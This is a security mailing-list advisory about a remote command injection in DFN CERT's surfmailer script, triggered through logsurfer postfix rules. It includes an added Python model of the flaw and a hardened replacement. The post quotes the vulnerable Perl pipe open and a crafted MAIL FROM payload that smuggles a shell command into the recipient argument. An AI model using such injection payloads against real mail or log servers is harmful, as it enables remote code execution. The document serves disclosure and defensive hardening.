
[Full-disclosure] DO NOT USE logsurfer configuration recommended by DFN CERT



##Logsurfer default recommendation / configuration Remote Code Execution / Injection
##discovered by kcope when securing a box

The Logsurfer program distributed by DFN CERT at
http://www.dfn-cert.de/eng/logsurf/
has a ridiculous remote code execution bug in one of its mailing scripts when
it is configured properly :)

From the homepage:
---snip---
"
The program "logsurfer" was designed to monitor any text-based logfiles on your
system in realtime. The large amount of loginformation collected
(like all messages handled by the syslog-daemon or logfiles from your
information services FTP, WWW etc.) makes it nearly impossible to check your
logs manually to find any unusual activity. You need a program to do this for 
you.
If you don't want to use a script that checks your logs in certain time 
intervals
(like once a day) then you might be interested in the programs like swatch or 
logsurfer.
"
---snip---

This program is also related to snort in some way.
From http://www.snort.org/docs/faq/1Q05/node94.html:

---snip---
"
5.9 How do I get Snort to e-mail me alerts?

You can't. Such a process would slow Snort down too much to make it of any use.
Instead, log to syslog and use swatch or logcheck to parse over the plaintext 
logfiles.

With the Logsurfer docs, this might get you on the road to doing something with 
Snort and Logsurfer:

    * http://www.obfuscation.org/emf/logsurfer/snort.txt

JASON HAAR provided an example Swatch (3.1beta) config that emails alerts:

    * http://www.theadamsfamily.net/~erek/snort/snort-swatch.conf.txt

Here are some docs on swatch:

    * http://www.oit.ucsb.edu/~eta/swatch/
    * http://www.stanford.edu/~atkins/swatch
    * http://rr.sans.org/sysadmin/swatch.php
    * http://www.enteract.com/ lspitz/swatch.html
    * http://www.cert.org/security-improvement/implementations/i042.01.html

IDS Center (see FAQ [*]) on Win32 will also mail alerts.
"
---snip---

Using the logsurfer configuration files from
http://www.obfuscation.org/emf/logsurfer/snort.txt
(as recommended by the snort team) or the default examples from the DFN CERT is
a very bad idea.
This will open your network wide because of the use of the "surfmailer" script,
which is recommended by the DFN CERT.

The "surfmailer" script from
http://www.obfuscation.org/emf/logsurfer/surfmailer looks as follows:

--- snip ---
#!/usr/bin/perl
use Getopt::Std;

getopts("S:r:");

my $SUBJECT = $opt_S if defined $opt_S;
my $RECIPIENT = $opt_r if defined $opt_r;

open OUTFILE, "|/usr/sbin/sendmail $RECIPIENT";

print OUTFILE "Subject: $SUBJECT\n\n";
while (<>) {
        print OUTFILE $_;
}
--- snip ---

This perl script does a getopt on the "-r" parameter, which comes from the
logsurfer configuration file, and then an open with a pipe character (duh!) to
sendmail (to deliver the logsurfer message to a system user).

Now let's take for example the postfix configuration file provided by DFN CERT at
ftp://ftp.cert.dfn.de/pub/tools/audit/logsurfer/config-examples/emf/postfix.txt:

---snip---
   ###
   ### The Postfix MTA.
   ###
   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: warning: (.*): hostname (.*) verification failed: Host not found' - - - 0
           open "$2 postfix\.*\\[$3\\]" - 1000 3600 300
           report "/usr/local/bin/surfmailer -r root -S \"SMTP connect from host with broken DNS: $4 $5\"" "$2 postfix\.*\\[$3\\]"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: connect from (.*)\[(.*)\]' - - - 0
           open "$2 postfix\.*\\[$3\\]\.*$5" - 1000 3600 300
           ignore

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from (.*)\[(.*)\]: 554 .* Recipient address rejected: Relay access denied' - - - 0 ignore

[1]'^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from (.*)\[(.*)\]: 455 <(.*)>: Sender address rejected: Domain not found' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from (.*)\[(.*)\]' - '.*' - 60
[2]                report "/usr/local/bin/surfmailer -r root -S \"$2 Sender address rejected: Domain not found from $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"

   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject' - - - 0
           rule before
           '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from (.*)\[(.*)\]' - '.*' - 60
                   report "/usr/local/bin/surfmailer -r root -S \"$2 rejected: Unknown reasons: $4 $5\"" "$2 postfix\.*\\[$3\\]\.*$5"


   '^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: disconnect from (.*)\[(.*)\]' - - - 0
           delete "$2 postfix\.*\\[$3\\]\.*$5"

   'postfix/(cleanup|qmgr)' - - - 0 ignore
---snip---


At the line marked by [1] in this configuration file snippet the regular
expression checks the system logs for rejected sender addresses of postfix.
If the rule matches, a "report" is sent as seen at the line marked as [2].
So when a bad guy connects to your postfix server and sends a "MAIL FROM:" line
to the daemon consisting of the following string:
"\"LOL -r ;touch /tmp/0wned;\""@notexisting.com
the surfmailer script is run with a RECIPIENT of ";touch /tmp/0wned;" the next
time logsurfer checks the logfiles for intrusions.
This RECIPIENT lands directly in the open function of the surfmailer script and
is executed!

So if you use the "surfmailer" script my advice is to rethink that and write
your own wrapper.
This is just a configuration issue but can be a hell of a bug, since this can
be exploited over different services like FTP, SSH, SMTP
(depending on the logsurfer rulesets and the craziness of the admin).

2008/kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
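
Editor's added example (not part of kcope's post, and not code from logsurfer or
surfmailer): a Python model of the data flow the post describes. It steps a
constructed postfix log line through the rule [1] regex, a logsurfer-style $n
expansion, shell tokenising, Getopt::Std's last-option-wins parsing, and the
string surfmailer hands to its two-argument open, then shows the allowlist plus
argv-list form a replacement wrapper should use instead. The log line, the
payload and the subject variant that also expands the rejected sender ($6) are
assumptions made for the example; $n is taken as $1 = whole match, $2.. =
capture groups, and sh-style tokenising of the report command is assumed, which
may differ from logsurfer's own tokeniser.

```python
r"""
Model of the surfmailer injection path and of a hardened replacement.
Added example: not code from kcope's post, logsurfer or surfmailer.

Assumptions (mine, not the post's): LOG_LINE and its payload are constructed;
logsurfer's $n expansion is modelled as plain text substitution with
$1 = whole match and $2.. = groups (the reading under which the quoted
"$2 postfix\.*\\[$3\\]" context names make sense); the report command is
tokenised with POSIX shell rules (shlex), which may differ from logsurfer's
own tokeniser; REPORT is rule [2] with the rejected sender ($6) added to the
subject, the field the post's payload travels in.
"""
import re
import shlex
from typing import Dict, List, Tuple

# Match regex of rule [1] from the quoted postfix.txt, unchanged.
RULE = re.compile(
    r'^.{15,} (.*) postfix/smtpd\[([0-9][0-9]*)\]: reject: RCPT from '
    r'(.*)\[(.*)\]: 455 <(.*)>: Sender address rejected: Domain not found'
)

# Report template: rule [2] with "$6" (rejected sender) appended (assumption).
REPORT = ('/usr/local/bin/surfmailer -r root -S "$2 Sender address rejected: '
          'Domain not found from $4 $5: $6"')

# Constructed log line.  The quoted local part of the sender is the payload:
# it closes the -S string, supplies a second -r, then reopens a string.
LOG_LINE = ('Jan 10 12:00:00 mx1 postfix/smtpd[4242]: reject: RCPT from '
            'unknown[203.0.113.5]: 455 <" -r ";touch /tmp/0wned;" x"@evil.example>: '
            'Sender address rejected: Domain not found')

# Characters that make Perl run a 2-arg open("|cmd") through sh -c instead of
# execvp-ing the words directly (the check in Perl's doio.c).
PERL_SHELL_METACHARS = '$&*(){}[]\'";\\|?<>~`\n'


def expand_report(template: str, m: re.Match) -> str:
    """logsurfer-style $n substitution: verbatim, no quoting or escaping."""
    values = [None, m.group(0), *m.groups()]

    def sub(mo: re.Match) -> str:
        n = int(mo.group(1))
        return values[n] if 0 < n < len(values) and values[n] is not None else mo.group(0)

    return re.sub(r'\$([0-9])', sub, template)


def getopt_std(argv: List[str], spec: str = 'S:r:') -> Tuple[Dict[str, str], List[str]]:
    """Model of Getopt::Std::getopts: options are consumed up to the first
    non-option word, and a repeated option overwrites the earlier value."""
    takes_arg = {spec[i]: (i + 1 < len(spec) and spec[i + 1] == ':')
                 for i in range(len(spec)) if spec[i] != ':'}
    opts: Dict[str, str] = {}
    rest = list(argv)
    while rest and rest[0].startswith('-') and len(rest[0]) > 1:
        word = rest.pop(0)
        if word == '--':
            break
        flag, attached = word[1], word[2:]
        if flag not in takes_arg:            # getopts warns and moves on
            if attached:
                rest.insert(0, '-' + attached)
            continue
        if takes_arg[flag]:
            opts[flag] = attached if attached else (rest.pop(0) if rest else '')
        else:
            opts[flag] = '1'
            if attached:
                rest.insert(0, '-' + attached)
    return opts, rest


def sendmail_pipe_command(recipient: str) -> str:
    """The string surfmailer gives to: open OUTFILE, "|/usr/sbin/sendmail $RECIPIENT"."""
    return '/usr/sbin/sendmail ' + recipient


def perl_would_use_shell(command: str) -> bool:
    """True when Perl's 2-arg pipe open would hand the string to sh -c."""
    body = command[:-1] if command.endswith('\n') else command
    return any(c in PERL_SHELL_METACHARS for c in body)


def run_vulnerable_path(log_line: str) -> Tuple[str, str, bool]:
    """log line -> report command -> argv -> -r value -> sendmail pipe string."""
    m = RULE.match(log_line)
    if m is None:
        raise ValueError('log line does not match rule [1]')
    argv = shlex.split(expand_report(REPORT, m))      # assumption: sh tokenising
    opts, _ = getopt_std(argv[1:])
    recipient = opts.get('r', '')
    pipe_cmd = sendmail_pipe_command(recipient)
    return recipient, pipe_cmd, perl_would_use_shell(pipe_cmd)


# --- hardened side: what a replacement wrapper should do instead ----------

# Local user or user@domain; a leading '-' cannot match, so the value can never
# be taken for a sendmail option either.
SAFE_RECIPIENT = re.compile(r'^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}(@[A-Za-z0-9.-]+)?$')


def recipient_is_safe(value: str) -> bool:
    return SAFE_RECIPIENT.match(value) is not None


def safe_sendmail_argv(recipient: str) -> List[str]:
    """argv for subprocess.Popen(argv, stdin=PIPE): no shell is involved, so
    nothing in the recipient is interpreted.  Perl form of the same idea:
    open(my $fh, '|-', '/usr/sbin/sendmail', $RECIPIENT)."""
    if not recipient_is_safe(recipient):
        raise ValueError(f'refusing recipient {recipient!r}')
    return ['/usr/sbin/sendmail', recipient]


if __name__ == '__main__':
    rec, cmd, uses_sh = run_vulnerable_path(LOG_LINE)
    print('recipient seen by surfmailer :', repr(rec))
    print('string given to open()       :', repr(cmd))
    print('Perl routes it through sh -c :', uses_sh)
    print('hardened argv for root       :', safe_sendmail_argv('root'))
    try:
        safe_sendmail_argv(rec)
    except ValueError as err:
        print('hardened wrapper             :', err)
```

Run as-is, the vulnerable path yields the recipient ';touch /tmp/0wned;' and a
pipe string that Perl would pass to sh -c, while the hardened builder refuses
the same value. In the Perl wrapper the corresponding change is the list form,
open(my $fh, '|-', '/usr/sbin/sendmail', $RECIPIENT), after checking
$RECIPIENT against an allowlist like SAFE_RECIPIENT: the list form alone keeps
the shell out, but a second -r coming from the log still overrides the
configured recipient, so the check is needed as well.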